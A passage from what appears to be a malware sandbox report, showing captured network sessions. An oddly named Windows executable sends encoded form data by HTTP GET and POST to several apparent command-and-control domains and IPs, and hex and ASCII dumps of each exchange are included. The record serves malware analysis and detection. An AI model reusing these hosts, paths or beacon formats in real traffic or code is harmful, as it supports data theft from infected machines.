                                                                                                                                  Data Raw: 6b 66 2d 48 42 78 3d 6b 34 6e 65 47 55 35 4c 72 2f 48 45 38 39 67 6f 76 72 68 67 4e 38 6d 73 46 31 62 43 4a 38 67 4a 53 35 55 78 2f 74 79 49 33 54 62 31 31 41 79 6d 50 50 2b 68 4a 6e 55 66 71 6d 6c 2f 38 4e 34 4d 45 41 42 65 4e 61 73 52 73 63 4c 6f 39 4a 34 48 74 37 77 34 34 44 71 66 45 55 72 68 68 59 45 44 43 75 55 38 51 4d 37 63 62 33 72 68 32 78 57 56 6a 6d 79 7a 79 53 68 7a 6d 4c 55 71 47 46 68 2f 72 55 6f 35 75 58 6f 49 6d 4d 79 78 34 74 78 42 70 53 45 46 54 6f 6d 63 51 7a 74 64 54 46 64 50 2b 6a 6c 68 7a 6a 6d 45 4c 4b 41 6e 44 6e 56 37 48 61 58 76 33 43 63 41 72 56 54 4c 77 62 70 4a 6c 77 6e 38 5a 43 43 6b 67 4b 6b 66 73 6d 6d 4e 30 59 75 69 50 35 41 57 55 77 69 6f 6d 33 30 2b 43 52 47 64 6a 53 57 4d 7a 32 36 34 44 51 7a 6b 38 72 33 69 39 56 6f 78 58 4c 78 4a 36 30 6a 4c 78 34 31 61 57 5a 35 4e 71 51 38 66 35 59 2b 6c 34 30 38 55 54 77 42 31 61 53 47 63 66 52 30 43 4a 31 37 4e 49 5a 73 61 4b 79 4c 6e 33 37 41 53 6d 77 30 7a 59 37 66 33 4c 46 75 44 35 53 36 54 6c 35 57 4d 77 32 67 6f 76 36 67 [TRUNCATED]
                                                                                                                                  Data Ascii: kf-HBx=k4neGU5Lr/HE89govrhgN8msF1bCJ8gJS5Ux/tyI3Tb11AymPP+hJnUfqml/8N4MEABeNasRscLo9J4Ht7w44DqfEUrhhYEDCuU8QM7cb3rh2xWVjmyzyShzmLUqGFh/rUo5uXoImMyx4txBpSEFTomcQztdTFdP+jlhzjmELKAnDnV7HaXv3CcArVTLwbpJlwn8ZCCkgKkfsmmN0YuiP5AWUwiom30+CRGdjSWMz264DQzk8r3i9VoxXLxJ60jLx41aWZ5NqQ8f5Y+l408UTwB1aSGcfR0CJ17NIZsaKyLn37ASmw0zY7f3LFuD5S6Tl5WMw2gov6gOnvtDxB5xdURxVAmiijrmiuhtG5ltwwiBb1vluG70BlEX1Y7Glqb6qLrZbsdAT1mjFrUjVqQkkT5Wcx+62x/n/4mfKY3BY31+dda1gBOFpb2IlMbMd1/aWx5PrnJM0sK9hf6NswPR47z27tv2Q8x3+OBwqAWFf8OkPrpjh/599StIg9+zHwhr3XhLRlpoilb36hDJio0wZSd80ezUhaECiXT4xQbFRhSOhHcI8U2wo2kCePR6ehlNpvSip5iw9vnpYu3YyHvSi54cWF4SkmV3jl4bTq3XcsyH6XfkcxEQNRiugwXtnhuCUzI2vOHGHYQ28XtAOzrfMhKmWkA8f0kWmzZNWog2SOMjAamQWrzkE0Qb3YDmha2F8t9IezvW7RlUa90bLUSK4/dbftSFOYeUByohvkkuxytLNkH9Fm5deg3y24w1CeJnA5tlZw/VPecYWd7dl9CLZNlMLpgO5sVZNpODxiovdzlMRb4/uEe1nxtDU2xHhDZkjk66sKu84KpN70w+L8W154KAJfpZGlytIZY4xa0r0ZDGhOzitk3vjrfvjVrtuVdShFaFl8vLhvav7OywclG+zAAld6HXUmDdjIJrxpenhkAGkiIfXQc/DrGRbJKqglEyIKaHCbTq3TQTY3iu+Kb7OHMb8onz0cX5nj1wbxuajC6qV [TRUNCATED]


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  8192.168.2.4498513.33.130.190801376C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 24, 2024 08:02:21.235765934 CEST531OUTGET /ou1g/?kf-HBx=p6P+FgoGiP/G4Ng2k4kydfL9CEjREuwmc4B14fS4wE3C00mAPriyDmdkjkAl1MwiKmR4YcU9y+Hnl6M9logr4guZJ1Pjn+I9YPEKQsPJSCqhxwn7206Dyyk=&oFA=_z5x9B5 HTTP/1.1
                                                                                                                                  Host: www.multileveltravel.world
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Oct 24, 2024 08:02:21.861932993 CEST394INHTTP/1.1 200 OK
                                                                                                                                  Server: openresty
                                                                                                                                  Date: Thu, 24 Oct 2024 06:02:21 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 254
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6b 66 2d 48 42 78 3d 70 36 50 2b 46 67 6f 47 69 50 2f 47 34 4e 67 32 6b 34 6b 79 64 66 4c 39 43 45 6a 52 45 75 77 6d 63 34 42 31 34 66 53 34 77 45 33 43 30 30 6d 41 50 72 69 79 44 6d 64 6b 6a 6b 41 6c 31 4d 77 69 4b 6d 52 34 59 63 55 39 79 2b 48 6e 6c 36 4d 39 6c 6f 67 72 34 67 75 5a 4a 31 50 6a 6e 2b 49 39 59 50 45 4b 51 73 50 4a 53 43 71 68 78 77 6e 37 32 30 36 44 79 79 6b 3d 26 6f 46 41 3d 5f 7a 35 78 39 42 35 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?kf-HBx=p6P+FgoGiP/G4Ng2k4kydfL9CEjREuwmc4B14fS4wE3C00mAPriyDmdkjkAl1MwiKmR4YcU9y+Hnl6M9logr4guZJ1Pjn+I9YPEKQsPJSCqhxwn7206Dyyk=&oFA=_z5x9B5"}</script></head></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  9192.168.2.449881206.119.82.134801376C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 24, 2024 08:02:27.519655943 CEST781OUTPOST /xqel/ HTTP/1.1
                                                                                                                                  Host: www.40wxd.top
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Origin: http://www.40wxd.top
                                                                                                                                  Referer: http://www.40wxd.top/xqel/
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Content-Length: 203
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Data Raw: 6b 66 2d 48 42 78 3d 69 74 43 6a 45 30 78 7a 32 78 6b 49 54 6e 30 58 33 52 72 6f 74 34 62 77 48 68 62 39 59 41 75 4c 30 63 58 38 73 73 70 72 72 2f 63 61 38 37 51 41 45 4b 6f 67 31 57 2f 57 4e 51 42 33 53 37 65 6b 69 56 62 54 46 58 42 46 68 2b 6c 32 46 78 38 34 53 47 2b 52 52 42 4d 7a 62 41 35 67 43 7a 4d 65 30 4c 63 7a 58 44 33 52 46 55 57 77 2f 69 36 33 30 48 79 65 7a 35 4d 46 46 78 71 2b 41 6e 32 39 54 37 2b 54 78 31 5a 4f 70 6c 79 30 39 6f 54 77 6b 77 49 71 2f 64 36 51 35 30 6f 50 7a 65 33 74 67 6e 2b 70 54 55 30 33 53 76 79 6f 41 72 34 4e 2b 74 52 51 64 42 68 45 39 6b 75 4f 72 57 6e 32 36 77 3d 3d
                                                                                                                                  Data Ascii: kf-HBx=itCjE0xz2xkITn0X3Rrot4bwHhb9YAuL0cX8ssprr/ca87QAEKog1W/WNQB3S7ekiVbTFXBFh+l2Fx84SG+RRBMzbA5gCzMe0LczXD3RFUWw/i630Hyez5MFFxq+An29T7+Tx1ZOply09oTwkwIq/d6Q50oPze3tgn+pTU03SvyoAr4N+tRQdBhE9kuOrWn26w==
                                                                                                                                  Oct 24, 2024 08:02:28.449692011 CEST691INHTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Thu, 24 Oct 2024 06:02:28 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 548
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  10192.168.2.449893206.119.82.134801376C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 24, 2024 08:02:30.067886114 CEST801OUTPOST /xqel/ HTTP/1.1
                                                                                                                                  Host: www.40wxd.top
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Origin: http://www.40wxd.top
                                                                                                                                  Referer: http://www.40wxd.top/xqel/
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Content-Length: 223
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Data Raw: 6b 66 2d 48 42 78 3d 69 74 43 6a 45 30 78 7a 32 78 6b 49 53 47 45 58 6b 32 48 6f 39 6f 62 2f 4d 42 62 39 53 67 76 43 30 63 62 38 73 74 74 37 6f 4e 34 61 39 62 41 41 57 59 41 67 67 57 2f 57 59 67 42 32 59 62 65 74 69 56 66 68 46 57 74 46 68 2b 68 32 46 77 4d 34 54 31 57 51 54 52 4d 78 52 51 35 6d 4d 54 4d 65 30 4c 63 7a 58 44 7a 72 46 55 4f 77 2f 53 4b 33 37 47 79 64 74 4a 4d 47 53 42 71 2b 58 58 32 68 54 37 2b 78 78 78 51 6a 70 6e 4b 30 39 73 66 77 6b 68 49 6c 78 64 37 56 6e 45 6f 64 2b 2f 32 63 75 33 62 30 52 31 4d 4e 4e 4e 6d 77 42 74 70 58 76 63 77 48 50 42 46 33 67 6a 6e 36 6d 56 61 2f 68 39 6f 56 5a 52 56 6b 34 6d 62 36 37 72 4d 76 37 30 61 65 77 65 77 3d
                                                                                                                                  Data Ascii: kf-HBx=itCjE0xz2xkISGEXk2Ho9ob/MBb9SgvC0cb8stt7oN4a9bAAWYAggW/WYgB2YbetiVfhFWtFh+h2FwM4T1WQTRMxRQ5mMTMe0LczXDzrFUOw/SK37GydtJMGSBq+XX2hT7+xxxQjpnK09sfwkhIlxd7VnEod+/2cu3b0R1MNNNmwBtpXvcwHPBF3gjn6mVa/h9oVZRVk4mb67rMv70aewew=
                                                                                                                                  Oct 24, 2024 08:02:30.985322952 CEST691INHTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Thu, 24 Oct 2024 06:02:30 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 548
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  11192.168.2.449909206.119.82.134801376C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 24, 2024 08:02:32.610771894 CEST10883OUTPOST /xqel/ HTTP/1.1
                                                                                                                                  Host: www.40wxd.top
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Origin: http://www.40wxd.top
                                                                                                                                  Referer: http://www.40wxd.top/xqel/
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Content-Length: 10303
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Data Raw: 6b 66 2d 48 42 78 3d 69 74 43 6a 45 30 78 7a 32 78 6b 49 53 47 45 58 6b 32 48 6f 39 6f 62 2f 4d 42 62 39 53 67 76 43 30 63 62 38 73 74 74 37 6f 4e 77 61 39 6f 34 41 45 70 41 67 6d 6d 2f 57 5a 67 42 7a 59 62 66 74 69 55 36 6f 46 57 78 56 68 38 70 32 45 53 6f 34 62 6b 57 51 5a 52 4d 78 5a 77 35 6e 43 7a 4e 55 30 50 41 2f 58 43 44 72 46 55 4f 77 2f 51 53 33 79 33 79 64 76 4a 4d 46 46 78 71 49 41 6e 32 64 54 37 6d 62 78 78 55 56 6f 55 43 30 39 4d 50 77 6d 54 77 6c 39 64 37 62 6d 45 70 4f 2b 36 75 48 75 33 48 34 52 31 6f 6e 4e 50 36 77 44 34 45 71 30 74 39 65 59 44 5a 61 31 30 43 51 74 6b 2b 62 75 4e 59 50 51 30 4a 6b 73 33 4c 4b 67 71 31 37 70 45 71 44 72 61 43 30 63 6b 67 6d 6c 41 2f 66 6b 55 47 53 6c 61 32 6b 52 6f 63 76 57 62 54 71 4b 35 35 45 76 2b 67 5a 54 6a 65 2b 62 62 50 73 50 6c 71 56 47 78 67 67 53 38 46 63 38 6f 31 71 43 35 44 47 4c 58 72 68 63 41 52 6a 75 39 31 7a 4f 71 39 6d 4c 35 6c 67 79 64 53 39 74 47 33 73 38 4f 49 6b 53 51 63 6f 6d 64 45 4d 78 4b 37 63 41 71 68 79 51 53 77 35 6f 6f 6c [TRUNCATED]
                                                                                                                                  Data Ascii: kf-HBx=itCjE0xz2xkISGEXk2Ho9ob/MBb9SgvC0cb8stt7oNwa9o4AEpAgmm/WZgBzYbftiU6oFWxVh8p2ESo4bkWQZRMxZw5nCzNU0PA/XCDrFUOw/QS3y3ydvJMFFxqIAn2dT7mbxxUVoUC09MPwmTwl9d7bmEpO+6uHu3H4R1onNP6wD4Eq0t9eYDZa10CQtk+buNYPQ0Jks3LKgq17pEqDraC0ckgmlA/fkUGSla2kRocvWbTqK55Ev+gZTje+bbPsPlqVGxggS8Fc8o1qC5DGLXrhcARju91zOq9mL5lgydS9tG3s8OIkSQcomdEMxK7cAqhyQSw5oolhfDFsJOieLTYg6rRMWpuqUsH9iSzUou3l+tTR8eLrLhvjooPln6BRCJNBpw6gKNQ2Yq4W0DjxCaz3FQ4m7BH4aHPXf3C+HglELZpoxKvXiuZIrL/ZFnK/uvSdwdJr9+BzkSLJopjOk0cliehPt0fDfDCzVF76ac2WfUrE9NCjgO8LnniaGQf/pcsPL6KWjklpUO2B7XAsT2BG0MIVaJcSKDn9OhIGC3x8p5pCPqJ4IwWR3EdSvfibp4ubpd15uuFQSj8ynBJ1UnXPcsfBw0Okx++UpvXZ7dI3+75KRpEkh5eplfLDG6tAhfrL3ladWLJFVKMOKxzUUd4OaSUebw1KanPvAtv/QO56fUXuY/yaxg7xJuVcQhlwwEuVmD3tEZiVtxU3jTrV7UF10fWEImCkWj4kITOyJiHBj+jqAtQmeKN3pG+IRn//TU6Zc4Cei5DYzpp0u8oXk5ff3aJ9n/XnrYJUENYesXADnjzOqGBgqeF7tYODhfkAGfs/fxzufmOoc0UG4uFwFw8iwCoES3/tanAa7IELrzuwxLKUrScRDWCUiB0SSZ4MSyM22uiqAeXu1K0lmGmbo+tR9rNfXOCEvxMxOz7hj00F0r2Se+48CudtUEdrdonozt/FL5l0t5rsFPzkbxN2RIcD/B1+HwvS8XkUBwUVZoHUk [TRUNCATED]
                                                                                                                                  Oct 24, 2024 08:02:33.537017107 CEST691INHTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Thu, 24 Oct 2024 06:02:33 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 548
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  12192.168.2.449922206.119.82.134801376C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 24, 2024 08:02:35.155971050 CEST518OUTGET /xqel/?kf-HBx=vvqDHEJ83RQMdUhh5kLoqoSDKB3hWQiq1sb91PtModI/1ZQDQosT/W6HQ09vXqzqrFP7Qh9498xTBzMpQmH7Kh5kUCFMd1INst0sGCzgDgfe+hjN7G6C4+s=&oFA=_z5x9B5 HTTP/1.1
                                                                                                                                  Host: www.40wxd.top
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Oct 24, 2024 08:02:36.082832098 CEST691INHTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Thu, 24 Oct 2024 06:02:35 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 548
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  13192.168.2.449956162.213.249.216801376C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 24, 2024 08:02:41.300297022 CEST787OUTPOST /rhgo/ HTTP/1.1
                                                                                                                                  Host: www.vasehub.xyz
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Origin: http://www.vasehub.xyz
                                                                                                                                  Referer: http://www.vasehub.xyz/rhgo/
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Content-Length: 203
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Data Raw: 6b 66 2d 48 42 78 3d 34 7a 59 51 63 6b 69 72 4f 4d 62 4f 55 71 62 48 6f 39 44 69 38 50 61 4b 2b 36 72 7a 56 67 33 54 71 6a 56 65 59 47 43 6e 46 52 50 61 4b 6c 56 42 7a 46 37 4a 64 7a 44 52 5a 46 67 51 51 6f 44 2f 63 54 71 52 67 4b 48 5a 64 46 58 6a 43 63 36 66 66 6f 31 51 35 42 75 6b 64 68 56 36 33 6c 44 7a 50 6a 52 74 47 58 6b 43 76 44 46 69 4b 38 72 56 69 64 64 6a 6c 57 64 31 31 4c 68 78 46 51 70 39 55 78 78 59 45 4c 48 42 6a 6b 37 4e 50 4c 39 44 63 6b 62 62 79 4f 4e 41 38 30 32 5a 43 79 38 6c 47 6e 54 75 4f 59 31 49 34 70 65 62 5a 50 31 6b 6d 71 43 4f 34 68 57 50 68 36 46 43 49 67 5a 37 72 51 3d 3d
